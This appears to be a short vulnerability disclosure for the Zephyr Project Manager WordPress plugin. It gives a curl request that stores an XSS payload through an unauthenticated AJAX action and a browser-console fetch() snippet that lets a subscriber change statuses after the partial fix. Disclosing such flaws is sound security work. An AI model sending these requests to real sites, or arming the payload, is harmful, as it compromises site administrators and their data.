## https://sploitus.com/exploit?id=WPEX-ID:82E01F95-81C2-46D8-898E-07B3B8A3F8C9
All AJAX actions are affected, below is an example for an unauthenticated Stored XSS by updating a Status
curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \
$'https://example.com/wp-admin/admin-ajax.php'
The XSS will be triggered when an admin will view the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories)
v3.2.5 fixed the CSRF and XSS, however proper auth was still missing, e.g: login as a subscriber and run the below command in the dev console of the web browser
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));